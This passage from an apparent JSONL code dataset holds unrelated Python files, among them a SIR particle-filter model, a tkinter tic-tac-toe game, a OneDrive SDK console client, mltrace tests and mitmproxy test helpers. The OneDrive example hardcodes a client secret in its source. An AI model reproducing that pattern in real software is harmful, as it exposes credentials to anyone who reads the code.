with open(name, \"w\") as f:\r\n f.write(stats)\r\n elif ext == \"json\":\r\n with open(name, \"w\") as f:\r\n json.dump(stats, f)\r\n else:\r\n raise\r\n\r\n\r\ndef load_checkpoint(filename, gpu=True):\r\n if os.path.exists(filename):\r\n checkpoint = torch.load(\r\n filename, map_location=lambda storage, loc: storage)\r\n else:\r\n print(\"No model found at {}\".format(filename))\r\n return checkpoint\r\n\r\n\r\ndef make_data_loader(opt, *args):\r\n if opt.dataset == \"atomic\":\r\n return atomic_data.GenerationDataLoader(opt, *args)\r\n elif opt.dataset == \"conceptnet\":\r\n return conceptnet_data.GenerationDataLoader(opt, *args)\r\n\r\n\r\ndef set_max_sizes(data_loader, force_split=None):\r\n data_loader.total_size = {}\r\n if force_split is not None:\r\n data_loader.total_size[force_split] = \\\r\n data_loader.sequences[force_split][\"total\"].size(0)\r\n return\r\n for split in data_loader.sequences:\r\n data_loader.total_size[split] = \\\r\n data_loader.sequences[split][\"total\"].size(0)\r\n"} {"ext": "py", "sha": "1a2f68d3a0b65297a09c5e1d61db26e06853631f", "content": "from .sir import SIR\nfrom common.config import data_type\nfrom common.linalg import as_array, as_matrix, init_weights\nfrom common.stats import RSS, MSPE, RMSE\nfrom numpy.random import normal, uniform\nfrom numpy import *\nfrom filtering.particlefilter import ParticleFilter\n\n\nclass ParticleSIR(SIR):\n \n def __init__(self, num_enbs, params):\n self.num_enbs = num_enbs\n super(ParticleSIR, self).__init__(params)\n\n del self.alpha\n del self.beta\n \n self.current_Is = uniform(0, self.i * 2, num_enbs)\n self.current_Ss = ones(num_enbs) - self.current_Is\n self.alphas = uniform(0., 1, num_enbs)\n self.betas = uniform(0., 1, num_enbs)\n\n self.weights = [init_weights(num_enbs)] # matrix-like\n\n for i in range(num_enbs):\n if self.alphas[i] < self.betas[i]:\n self.alphas[i], self.betas[i] = self.betas[i], self.alphas[i] \n\n self.Is = [self.current_Is.tolist()]\n self.Ss = [self.current_Ss.tolist()]\n\n def update_states(self):\n for j in range(self.num_enbs):\n s = self.current_Ss[j]\n i = self.current_Is[j]\n s += self._delta_s(self.current_Ss[j], self.current_Is[j], \n self.alphas[j])\n i += self._delta_i(self.current_Ss[j], self.current_Is[j], \n self.alphas[j], self.betas[j])\n\n s = self.check_bounds(s)\n i = self.check_bounds(i)\n\n self.current_Is[j] = i\n self.current_Ss[j] = s\n\n self.Is.append(self.current_Is.tolist())\n self.Ss.append(self.current_Ss.tolist())\n\n def _init_filter(self):\n num_states = 4\n num_obs = 1\n \n self.filter = ParticleFilter(self.num_enbs)\n\n def predict_with_filter(self):\n F = self.filter\n\n while self.epoch < self.epochs - 1:\n X = as_matrix([self.current_Ss, self.current_Is, \n self.alphas, self.betas])\n \n F.fit(X)\n y = self.CDC_obs[self.epoch]\n F.step(y, predict_P=False)\n self.weights.append(F.weights)\n\n x_post = F.x_post\n for j in range(self.num_enbs):\n self.current_Ss[j] = self.check_bounds(x_post[0, j])\n self.current_Is[j] = self.check_bounds(x_post[1, j])\n self.alphas[j] = self.check_bounds(x_post[2, j], inf)\n self.betas[j] = self.check_bounds(x_post[3, j], inf)\n\n self.update_states()\n self.epoch += 1\n\n self.get_score()\n\n def _delta_s(self, s, i, alpha):\n return - alpha * s * i\n\n def _delta_i(self, s, i, alpha, beta):\n return alpha * s * i - beta * i\n\n def check_par_bounds(self, par):\n if par < 0: par = 0\n return par\n\n def get_score(self):\n I_mat = as_array(self.Is)\n for i, w in enumerate(self.weights):\n I_mat[i] *= w \n\n self.IS = sum(I_mat, axis=1)\n\n time_gap = self.epochs / 52\n idx = [x for x in range(self.epochs) if not x % time_gap]\n\n self.score = RSS(self.CDC_obs, self.IS[idx])\n self.scores = {}\n self.scores['SSE'] = self.score\n self.scores['RMSE'] = RMSE(self.CDC_obs, self.IS[idx])\n self.scores['MSPE'] = MSPE(self.CDC_obs, self.IS[idx])\n self.scores['CORR'] = corrcoef(self.CDC_obs, self.IS[idx])[0, 1]\n return self.score\n"} {"ext": "py", "sha": "1a2f6941e27fb89420a1d6e6a0b3c69ea5a9c28b", "content": "from typing import Any, Dict, Optional, Set\n\nimport great_expectations.exceptions as ge_exceptions\nfrom great_expectations.core.expectation_configuration import ExpectationConfiguration\nfrom great_expectations.rule_based_profiler.expectation_configuration_builder import (\n ExpectationConfigurationBuilder,\n)\nfrom great_expectations.rule_based_profiler.types import Domain, ParameterContainer\nfrom great_expectations.rule_based_profiler.util import (\n get_parameter_value_and_validate_return_type,\n)\n\n\nclass DefaultExpectationConfigurationBuilder(ExpectationConfigurationBuilder):\n \"\"\"\n Class which creates ExpectationConfiguration out of a given Expectation type and\n parameter_name-to-parameter_fully_qualified_parameter_name map (name-value pairs supplied in the kwargs dictionary).\n \"\"\"\n\n exclude_field_names: Set[str] = {\n \"kwargs\",\n }\n\n def __init__(\n self,\n expectation_type: str,\n meta: Optional[Dict[str, Any]] = None,\n **kwargs,\n ):\n super().__init__(expectation_type=expectation_type, **kwargs)\n\n self._kwargs = kwargs\n\n if meta is None:\n meta = {}\n\n if not isinstance(meta, dict):\n raise ge_exceptions.ProfilerExecutionError(\n message=f\"\"\"Argument \"{meta}\" in \"{self.__class__.__name__}\" must be of type \"dictionary\" \\\n(value of type \"{str(type())}\" was encountered).\n\"\"\"\n )\n\n self._meta = meta\n\n @property\n def expectation_type(self) -> str:\n return self._expectation_type\n\n @property\n def kwargs(self) -> dict:\n return self._kwargs\n\n @property\n def meta(self) -> dict:\n return self._meta\n\n def _build_expectation_configuration(\n self,\n domain: Domain,\n variables: Optional[ParameterContainer] = None,\n parameters: Optional[Dict[str, ParameterContainer]] = None,\n ) -> ExpectationConfiguration:\n parameter_name: str\n fully_qualified_parameter_name: str\n expectation_kwargs: Dict[str, Any] = {\n parameter_name: get_parameter_value_and_validate_return_type(\n domain=domain,\n parameter_reference=fully_qualified_parameter_name,\n expected_return_type=None,\n variables=variables,\n parameters=parameters,\n )\n for parameter_name, fully_qualified_parameter_name in self.kwargs.items()\n }\n meta: Dict[str, Any] = get_parameter_value_and_validate_return_type(\n domain=domain,\n parameter_reference=self.meta,\n expected_return_type=dict,\n variables=variables,\n parameters=parameters,\n )\n return ExpectationConfiguration(\n expectation_type=self.expectation_type,\n kwargs=expectation_kwargs,\n meta=meta,\n )\n"} {"ext": "py", "sha": "1a2f698957882dcea8b690d9abd96592d8e8f8b5", "content": "from tkinter import *\r\nfrom tkinter import messagebox\r\nroot=Tk()\r\nroot.title(\"TIC TAC TOE!\")\r\npress=True\r\nflag=0\r\ns1=\"0\"\r\ns2=\"0\"\r\n#main game logic\r\ndef check(button):\r\n global press\r\n global flag\r\n global s1\r\n global s2\r\n \r\n #alternate player turn's logic\r\n if button[\"text\"]==\"\" and press==True:\r\n button[\"text\"]=\"X\"\r\n press=False\r\n flag+=1\r\n elif button[\"text\"]==\"\" and press==False:\r\n button[\"text\"]=\"O\"\r\n press=True\r\n flag+=1\r\n \r\n # X winning logic\r\n if (button1[\"text\"]==\"X\" and button2[\"text\"]==\"X\" and button3[\"text\"]==\"X\" or\r\n button1[\"text\"]==\"X\" and button4[\"text\"]==\"X\" and button7[\"text\"]==\"X\" or\r\n button2[\"text\"]==\"X\" and button5[\"text\"]==\"X\" and button8[\"text\"]==\"X\" or\r\n button3[\"text\"]==\"X\" and button6[\"text\"]==\"X\" and button9[\"text\"]==\"X\" or\r\n button7[\"text\"]==\"X\" and button8[\"text\"]==\"X\" and button9[\"text\"]==\"X\" or\r\n button4[\"text\"]==\"X\" and button5[\"text\"]==\"X\" and button6[\"text\"]==\"X\" or\r\n button1[\"text\"]==\"X\" and button5[\"text\"]==\"X\" and button9[\"text\"]==\"X\" or\r\n button7[\"text\"]==\"X\" and button5[\"text\"]==\"X\" and button3[\"text\"]==\"X\"):\r\n messagebox.showinfo(\"GAME OVER\",\"X Is Winner!\")\r\n flag=0\r\n press=True\r\n s1=int(s1)\r\n s1=(s1+1)\r\n s1=str(s1)\r\n var0.set(s1)\r\n reset()\r\n \r\n # O winning logic\r\n elif (button1[\"text\"]==\"O\" and button2[\"text\"]==\"O\" and button3[\"text\"]==\"O\" or\r\n button1[\"text\"]==\"O\" and button4[\"text\"]==\"O\" and button7[\"text\"]==\"O\" or\r\n button2[\"text\"]==\"O\" and button5[\"text\"]==\"O\" and button8[\"text\"]==\"O\" or\r\n button3[\"text\"]==\"O\" and button6[\"text\"]==\"O\" and button9[\"text\"]==\"O\" or\r\n button7[\"text\"]==\"O\" and button8[\"text\"]==\"O\" and button9[\"text\"]==\"O\" or\r\n button4[\"text\"]==\"O\" and button5[\"text\"]==\"O\" and button6[\"text\"]==\"O\" or\r\n button1[\"text\"]==\"O\" and button5[\"text\"]==\"O\" and button9[\"text\"]==\"O\" or\r\n button7[\"text\"]==\"O\" and button5[\"text\"]==\"O\" and button3[\"text\"]==\"O\"):\r\n messagebox.showinfo(\"GAME OVER\",\"O Is Winner!\")\r\n flag=0\r\n press=True\r\n s2=int(s2)\r\n s2=(s2+1)\r\n s2=str(s2)\r\n var1.set(s2)\r\n reset()\r\n \r\n\r\n\r\n elif flag>=9:\r\n messagebox.showinfo(\"GAME OVER\",\"Match Is Draw!\")\r\n flag=0\r\n press=True\r\n reset()\r\n \r\ndef resetscore():\r\n global s1\r\n global s2\r\n s1=\"0\"\r\n s2=\"0\"\r\n var0.set(s1)\r\n var1.set(s2)\r\n \r\ndef reset():\r\n button1[\"text\"]=\"\"\r\n button2[\"text\"]=\"\"\r\n button3[\"text\"]=\"\"\r\n button4[\"text\"]=\"\"\r\n button5[\"text\"]=\"\"\r\n button6[\"text\"]=\"\"\r\n button7[\"text\"]=\"\"\r\n button8[\"text\"]=\"\"\r\n button9[\"text\"]=\"\"\r\n\r\n#score logic\r\nscore=Label(root,text=\"---<:{ $core }:>---\",font=(\"Verdana\",\"15\",\"normal\"))\r\nscore.pack(anchor=N)\r\n\r\nvar0=StringVar()\r\nscoren=Frame(root)\r\nscoren.pack(anchor=W)\r\nscorep1=Label(scoren,text=\"player X:\",font=(\"Verdana\",\"11\",\"bold\"))\r\nscorep1.grid(row=0,column=0)\r\nscorep1c=Label(scoren,textvariable=var0,font=(\"Segoe UI\",\"14\",\"bold\"))\r\nscorep1c.grid(row=0,column=1)\r\nvar0.set(s1)\r\n\r\nvar1=StringVar()\r\nscorep2=Label(scoren,text=\"\\tplayer O:\",font=(\"Verdana\",\"11\",\"bold\"))\r\nscorep2.grid(row=0,column=2)\r\nscorep2c=Label(scoren,textvariable=var1,font=(\"Segoe UI\",\"14\",\"bold\"))\r\nscorep2c.grid(row=0,column=3)\r\nvar1.set(s2)\r\n\r\n#button logic\r\nbuttonframe=Frame(root)\r\nbuttonframe.pack(padx=5,pady=5)\r\n\r\nbutton1=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button1))\r\nbutton1.grid(row=0,column=0)\r\nbutton2=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button2))\r\nbutton2.grid(row=0,column=1)\r\nbutton3=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button3))\r\nbutton3.grid(row=0,column=2)\r\nbutton4=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button4))\r\nbutton4.grid(row=1,column=0)\r\nbutton5=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button5))\r\nbutton5.grid(row=1,column=1)\r\nbutton6=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button6))\r\nbutton6.grid(row=1,column=2)\r\nbutton7=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button7))\r\nbutton7.grid(row=2,column=0)\r\nbutton8=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button8))\r\nbutton8.grid(row=2,column=1)\r\nbutton9=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button9))\r\nbutton9.grid(row=2,column=2)\r\n\r\nbuttonresetscore=Button(root,text=\"---| Reset $core |---\",font=(\"Verdana\",\"13\",\"normal\"),command=lambda:resetscore())\r\nbuttonresetscore.pack(fill=X,side=BOTTOM)\r\n\r\nbuttonresetboard=Button(root,text=\"---| Reset Board # |---\",font=(\"Verdana\",\"13\",\"normal\"),command=lambda:reset())\r\nbuttonresetboard.pack(fill=X,side=BOTTOM)\r\n\r\nroot.mainloop()\r\n"} {"ext": "py", "sha": "1a2f6b26d18ed65f77729b5229ceba6d8429758d", "content": "from __future__ import unicode_literals\n\nimport onedrivesdk\nfrom onedrivesdk.helpers import GetAuthCodeServer\nfrom PIL import Image\nimport os\n\ninput = getattr(__builtins__, 'raw_input', input)\n\ndef main():\n redirect_uri = \"http://localhost:8080/\"\n client_secret = \"BqaTYqI0XI7wDKcnJ5i3MvLwGcVsaMVM\"\n\n client = onedrivesdk.get_default_client(client_id='00000000481695BB',\n scopes=['wl.signin',\n 'wl.offline_access',\n 'onedrive.readwrite'])\n auth_url = client.auth_provider.get_auth_url(redirect_uri)\n\n # Block thread until we have the code\n code = GetAuthCodeServer.get_auth_code(auth_url, redirect_uri)\n # Finally, authenticate!\n client.auth_provider.authenticate(code, redirect_uri, client_secret)\n item_id = \"root\"\n copy_item_ids = None\n action = 0\n\n while True:\n items = navigate(client, item_id)\n print(\"0: UP\")\n count = 0\n for count, item in enumerate(items):\n print(\"{} {}\".format(count+1, item.name if item.folder is None else \"/\"+item.name))\n\n selected = input(\"Select item, enter 'C' to copy all, enter 'L' to list changes in current folder: \")\n\n if selected == \"C\":\n copy_item_ids = []\n for item in items:\n copy_item_ids.append(item.id)\n\n elif selected == \"L\":\n token = input(\"Enter your token, or nothing if you do not have one: \")\n list_changes(client, item_id, token)\n\n else:\n selected = int(selected)\n\n if selected == 0:\n item_id = get_parent_id(client, item_id)\n else:\n action = int(input(\"Select action: 1:Navigate 2:Rename 3:View Thumbnail 4: Get Sharing Link 5: List Changes 6:Download 7:Upload 8:Delete 9:Copy{}... \".format(\" 10: Paste\" if copy_item_ids else \"\")))\n if items[selected-1].folder is None or (action != 6 and action != 1):\n if action == 1:\n print(\"Can't navigate a file\")\n elif action == 2:\n rename(client, items[selected-1].id)\n elif action == 3:\n view_thumbnail(client, items[selected-1].id)\n elif action == 4:\n get_sharing_link(client, items[selected-1].id)\n elif action == 5:\n token = input(\"Enter your token, or nothing if you do not have one: \")\n list_changes(client, items[selected-1].id, token)\n elif action == 6:\n download(client, items[selected-1].id)\n elif action == 7:\n if item.folder is None:\n print(\"You cannot upload to a file\")\n else:\n upload(client, items[selected-1].id)\n elif action == 8:\n delete(client, items[selected-1].id)\n elif action == 9:\n copy_item_ids = [items[selected-1].id]\n elif action == 10 and copy_item_ids:\n if items[selected-1].folder:\n paste(client, items[selected-1].id, copy_item_ids)\n else:\n print(\"Can't copy to a file\")\n else:\n item_id = items[selected-1].id\n\n\ndef navigate(client, item_id):\n items = client.item(id=item_id).children.get()\n return items\n\n\ndef rename(client, item_id):\n new_name = input(\"Enter new name: \")\n renamed_item = onedrivesdk.Item()\n renamed_item.name = new_name\n renamed_item.id = item_id\n client.item(id=item_id).update(renamed_item)\n\n\ndef view_thumbnail(client, item_id):\n if len(client.item(id=item_id).thumbnails.get()) == 0:\n print(\"File does not have any thumbnails!\\n\")\n else:\n action = int(input(\"Size? 1:Small 2:Medium 3:Large... \"))\n try:\n os.remove(\"./tmp_thumb.jpg\")\n except:\n pass\n if action == 1:\n client.item(id=item_id).thumbnails[0].small.download(\"./tmp_thumb.jpg\")\n elif action == 2:\n client.item(id=item_id).thumbnails[0].medium.download(\"./tmp_thumb.jpg\")\n elif action == 3:\n client.item(id=item_id).thumbnails[0].large.download(\"./tmp_thumb.jpg\")\n image = Image.open(\"./tmp_thumb.jpg\")\n image.show()\n\n\ndef get_sharing_link(client, item_id):\n action = int(input(\"Type? 1:View 2:Edit... \"))\n permission = client.item(id=item_id).create_link(\"view\" if action == 1 else \"edit\").post()\n print(\"\\n{}\\n\".format(permission.link.web_url))\n\n\ndef download(client, item_id):\n directory = input(\"Enter download directory (can be relative): \")\n client.item(id=item_id).download(directory)\n\n\ndef upload(client, item_id):\n directory = input(\"Enter upload file directory (can be relative): \")\n name = input(\"Enter file name with extension: \")\n client.item(id=item_id).children[name].upload(directory)\n\n\ndef delete(client, item_id):\n confirm = input(\"Confirm delete? Y/N: \")\n if confirm == \"Y\":\n client.item(id=item_id).delete()\n\n\ndef paste(client, item_id, copy_item_ids):\n ref = onedrivesdk.ItemReference()\n ref.id = item_id\n for id in copy_item_ids:\n client.item(id=id).copy(parent_reference=ref).post()\n\n\ndef list_changes(client, item_id, token):\n collection_page = client.item(id=item_id).delta(token).get()\n for item in collection_page:\n print(item.name)\n\n print(\"TOKEN: {}\".format(collection_page.token))\n\n\ndef get_parent_id(client, item_id):\n id = client.item(id=item_id).get().parent_reference.id\n return id\n\nif __name__ == \"__main__\":\n main()"} {"ext": "py", "sha": "1a2f6c799c17fb14d2f2a92b26e184b7470db5fe", "content": "# (C) Datadog, Inc. 2018\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nimport sys\n\nfrom .tooling.cli import checksdev\n\n\nsys.exit(checksdev())\n"} {"ext": "py", "sha": "1a2f6ca2696ebe288e70eded2becccc9e7440570", "content": "from flask import Flask\nfrom os import getenv\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = getenv('DATABASE_URI')\napp.config['SQALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\nfrom application import routes"} {"ext": "py", "sha": "1a2f6d44c2201ac61c6ceeed9258fa77cd45998b", "content": "#!/usr/local/epd/bin/python\n#-----------------------------------------------------------\n# \n#-----------------------------------------------------------\ndef SetPyWignerCUDA_Path():\n\timport sys\n\tsys.path.append(\"/home/rcabrera/Documents/source/python/PyWignerCUDA\")\n"} {"ext": "py", "sha": "1a2f6da490bdb85625c68ffbd19e1ca73b40428e", "content": "def report_generator(file_path1, file_path2):\n import numpy as np\n import pandas as pd\n from IPython.display import display\n \n # read excel files\n df1 = pd.read_excel(file_path1, sheet_name = 1, index_col= 0, header = 1, usecols = range(41), skipfooter = 17)\n df2 = pd.read_excel(file_path2, sheet_name = 6, index_col= 0, header = 0, usecols = range(46), skipfooter = 0)\n \n cols = [0, 3, 5, 8, 10, 13, 15, 18]\n df3 = pd.read_excel(file_path2, sheet_name = 1, header = 0, usecols = cols, skipfooter = 3)\n df4 = pd.read_excel(file_path2, sheet_name = 2, header = 0, usecols = cols, skipfooter = 6)\n df5 = pd.concat([df3.tail(2), df4.tail(2)], axis = 1)\n \n # check the data \n display(df1.tail(2))\n display(df2.tail(2))\n display(df5.tail(2))\n \n report = pd.read_excel('一手住宅简报格式.xlsx', sheet_name = 1, header = 0, index_col = 0,\n skipfooter = 33, usecols = range(0, 45))\n display(report.tail(2))\n \n # generate supply and sales data of new houses in 40 cities\n cities = list(report.columns[4:])\n dict = {}\n for i in cities:\n dict[i] = [df1[i][-1], df2[i][-1]]\n\n result = pd.DataFrame(dict, index = ['40城住宅成交', '40城住宅供应'])\n \n \n # generate new house prices in 8 major cities\n dict2 = {}\n k = 0\n j = 1\n while j <= 15:\n dict2[df5.columns[k]] = df5.iloc[-1, j]\n k = k + 2\n j = j + 2\n\n result2 = pd.DataFrame(dict2, index = [df5.iloc[-1, 0]])\n \n # write the results into one excel file\n writer = pd.ExcelWriter('result_newhouse.xlsx')\n result.to_excel(writer, sheet_name = 'supply_and_sales')\n result2.to_excel(writer, sheet_name = 'prices')\n writer.save()\n \n return\n\nprint('运行 report_generator(40城,20城)')\n"} {"ext": "py", "sha": "1a2f6e8198d39d4856437106bb2118557054f170", "content": "import copy\nimport unittest\n\nfrom datetime import datetime\nfrom mltrace.db import Component, ComponentRun, IOPointer, Store\n\n\nclass TestDags(unittest.TestCase):\n def setUp(self):\n self.store = Store(\"test\")\n\n def testLinkedList(self):\n # Create chain of component runs\n expected_result = []\n num_runs = 10\n for i in range(1, num_runs + 1):\n self.store.create_component(f\"mock_component_{i}\", \"\", \"\")\n inp = self.store.get_io_pointer(f\"iop_{i}\")\n out = self.store.get_io_pointer(f\"iop_{i + 1}\")\n cr = self.store.initialize_empty_component_run(\n f\"mock_component_{i}\"\n )\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(inp)\n cr.add_output(out)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n expected_result.append((num_runs - i, i))\n\n # Reverse the expected result\n expected_result.reverse()\n\n # Trace the final output\n trace = self.store.trace(\"iop_11\")\n level_id = [(level, cr.id) for level, cr in trace]\n self.assertEqual(expected_result, level_id)\n\n def testVersionedComputation(self):\n # Run the same computation many times\n self.store.create_component(\"mock_component\", \"\", \"\")\n num_runs = 10\n for i in range(1, num_runs + 1):\n inp = self.store.get_io_pointer(\"inp\")\n out = self.store.get_io_pointer(\"out\")\n cr = self.store.initialize_empty_component_run(\"mock_component\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(inp)\n cr.add_output(out)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Trace the out pointer. Only most recent run ID should show.\n trace = self.store.trace(\"out\")\n self.assertEqual(len(trace), 1)\n self.assertEqual(trace[0][0], 0)\n self.assertEqual(trace[0][1].id, num_runs)\n\n def testTree(self):\n # Create a tree of component runs, 5 levels deep\n num_levels = 2\n global cr_counter\n global iop_counter\n cr_counter = 1\n iop_counter = 1\n\n def create_tree(level, inp):\n if level == num_levels:\n return\n\n global cr_counter\n global iop_counter\n\n self.store.create_component(f\"mock_component_{cr_counter}\", \"\", \"\")\n cr = self.store.initialize_empty_component_run(\n f\"mock_component_{cr_counter}\"\n )\n cr_counter += 1\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n\n # Create output pointers\n out1 = self.store.get_io_pointer(f\"iop_{iop_counter}\")\n iop_counter += 1\n out2 = self.store.get_io_pointer(f\"iop_{iop_counter}\")\n iop_counter += 1\n\n # Add and commit component run\n cr.add_input(inp)\n cr.add_outputs([out1, out2])\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Create left and right trees\n create_tree(level + 1, out1)\n create_tree(level + 1, out2)\n\n # Create first input pointer and tree of computation\n inp = self.store.get_io_pointer(f\"iop_{iop_counter}\")\n iop_counter += 1\n create_tree(0, inp)\n\n # Grab last iop id and trace it\n last_iop_id = f\"iop_{iop_counter - 1}\"\n trace = self.store.trace(last_iop_id)\n level_id = [(level, cr.id) for level, cr in trace]\n self.assertEqual(level_id, [(0, 3), (1, 1)])\n\n def testCycle(self):\n # Create cycle. Since dependencies are versioned, we shouldn't run\n # into problems.\n # Create io pointers and components\n iop1 = self.store.get_io_pointer(\"iop1\")\n iop2 = self.store.get_io_pointer(\"iop2\")\n self.store.create_component(\"component_1\", \"\", \"\")\n self.store.create_component(\"component_2\", \"\", \"\")\n\n # Create component runs\n cr = self.store.initialize_empty_component_run(\"component_1\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop1)\n cr.add_output(iop2)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n cr = self.store.initialize_empty_component_run(\"component_2\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop2)\n cr.add_output(iop1)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Trace iop1\n trace_1 = [(level, cr.id) for level, cr in self.store.trace(\"iop1\")]\n trace_2 = [(level, cr.id) for level, cr in self.store.trace(\"iop2\")]\n self.assertEqual(trace_1, [(0, 2), (1, 1)])\n self.assertEqual(trace_2, [(0, 1)])\n\n def testStaleUpdate(self):\n # Create computation with stale update.\n iop1 = self.store.get_io_pointer(\"iop1\")\n iop2 = self.store.get_io_pointer(\"iop2\")\n iop3 = self.store.get_io_pointer(\"iop3\")\n iop4 = self.store.get_io_pointer(\"iop4\")\n self.store.create_component(\"component_1\", \"\", \"\")\n self.store.create_component(\"component_2\", \"\", \"\")\n\n # Create first component\n cr = self.store.initialize_empty_component_run(\"component_1\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop1)\n cr.add_output(iop2)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Create second component run\n cr = self.store.initialize_empty_component_run(\"component_1\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop1)\n cr.add_output(iop3)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Create third component run that depends on the first (stale update)\n cr = self.store.initialize_empty_component_run(\"component_2\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop2)\n cr.add_output(iop4)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Trace iop4\n trace = [\n (level, cr.id, cr.stale) for level, cr in self.store.trace(\"iop4\")\n ]\n res = [\n (\n 0,\n 3,\n [\n \"component_1 (ID 1) has 1 fresher run(s) that began \"\n + \"before this component run started.\"\n ],\n ),\n (1, 1, []),\n ]\n self.assertEqual(trace, res)\n\n def testStaleTime(self):\n # Create computation with stale update.\n iop1 = self.store.get_io_pointer(\"iop1\")\n iop2 = self.store.get_io_pointer(\"iop2\")\n iop3 = self.store.get_io_pointer(\"iop3\")\n self.store.create_component(\"component_1\", \"\", \"\")\n self.store.create_component(\"component_2\", \"\", \"\")\n now = datetime.utcnow()\n\n # Create first component\n cr = self.store.initialize_empty_component_run(\"component_1\")\n cr.set_start_timestamp(now.replace(month=now.month - 2))\n cr.set_end_timestamp()\n cr.add_input(iop1)\n cr.add_output(iop2)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Create second component run\n cr = self.store.initialize_empty_component_run(\"component_2\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop2)\n cr.add_output(iop3)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Trace\n trace = [\n (level, cr.id, cr.stale) for level, cr in self.store.trace(\"iop3\")\n ]\n res = [(0, 2, [\"component_1 (ID 1) was run 61 days ago.\"]), (1, 1, [])]\n self.assertEqual(trace, res)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"} {"ext": "py", "sha": "1a2f6edaf7508e8f226000be8dc8d908aec1adb9", "content": "import io\nimport uuid\n\nfrom mitmproxy.test import tutils\nfrom mitmproxy import tcp\nfrom mitmproxy import websocket\nfrom mitmproxy import controller\nfrom mitmproxy import http\nfrom mitmproxy import flow\nfrom mitmproxy.net import http as net_http\nfrom mitmproxy.proxy import context\n\nfrom wsproto.frame_protocol import Opcode\n\n\ndef ttcpflow(client_conn=True, server_conn=True, messages=True, err=None):\n if client_conn is True:\n client_conn = tclient_conn()\n if server_conn is True:\n server_conn = tserver_conn()\n if messages is True:\n messages = [\n tcp.TCPMessage(True, b\"hello\"),\n tcp.TCPMessage(False, b\"it's me\"),\n ]\n if err is True:\n err = terr()\n\n f = tcp.TCPFlow(client_conn, server_conn)\n f.messages = messages\n f.error = err\n f.reply = controller.DummyReply()\n return f\n\n\ndef twebsocketflow(client_conn=True, server_conn=True, messages=True, err=None, handshake_flow=True):\n\n if client_conn is True:\n client_conn = tclient_conn()\n if server_conn is True:\n server_conn = tserver_conn()\n if handshake_flow is True:\n req = http.HTTPRequest(\n \"example.com\",\n 80,\n b\"GET\",\n b\"http\",\n b\"example.com\",\n b\"/ws\",\n b\"HTTP/1.1\",\n headers=net_http.Headers(\n connection=\"upgrade\",\n upgrade=\"websocket\",\n sec_websocket_version=\"13\",\n sec_websocket_key=\"1234\",\n ),\n content=b'',\n trailers=None,\n timestamp_start=946681200,\n timestamp_end=946681201,\n\n )\n resp = http.HTTPResponse(\n b\"HTTP/1.1\",\n 101,\n reason=net_http.status_codes.RESPONSES.get(101),\n headers=net_http.Headers(\n connection='upgrade',\n upgrade='websocket',\n sec_websocket_accept=b'',\n ),\n content=b'',\n trailers=None,\n timestamp_start=946681202,\n timestamp_end=946681203,\n )\n handshake_flow = http.HTTPFlow(client_conn, server_conn)\n handshake_flow.request = req\n handshake_flow.response = resp\n\n f = websocket.WebSocketFlow(client_conn, server_conn, handshake_flow)\n f.metadata['websocket_handshake'] = handshake_flow.id\n handshake_flow.metadata['websocket_flow'] = f.id\n handshake_flow.metadata['websocket'] = True\n\n if messages is True:\n messages = [\n websocket.WebSocketMessage(Opcode.BINARY, True, b\"hello binary\"),\n websocket.WebSocketMessage(Opcode.TEXT, True, b\"hello text\"),\n websocket.WebSocketMessage(Opcode.TEXT, False, b\"it's me\"),\n ]\n if err is True:\n err = terr()\n\n f.messages = messages\n f.error = err\n f.reply = controller.DummyReply()\n return f\n\n\ndef tflow(client_conn=True, server_conn=True, req=True, resp=None, err=None):\n \"\"\"\n @type client_conn: bool | None | mitmproxy.proxy.connection.ClientConnection\n @type server_conn: bool | None | mitmproxy.proxy.connection.ServerConnection\n @type req: 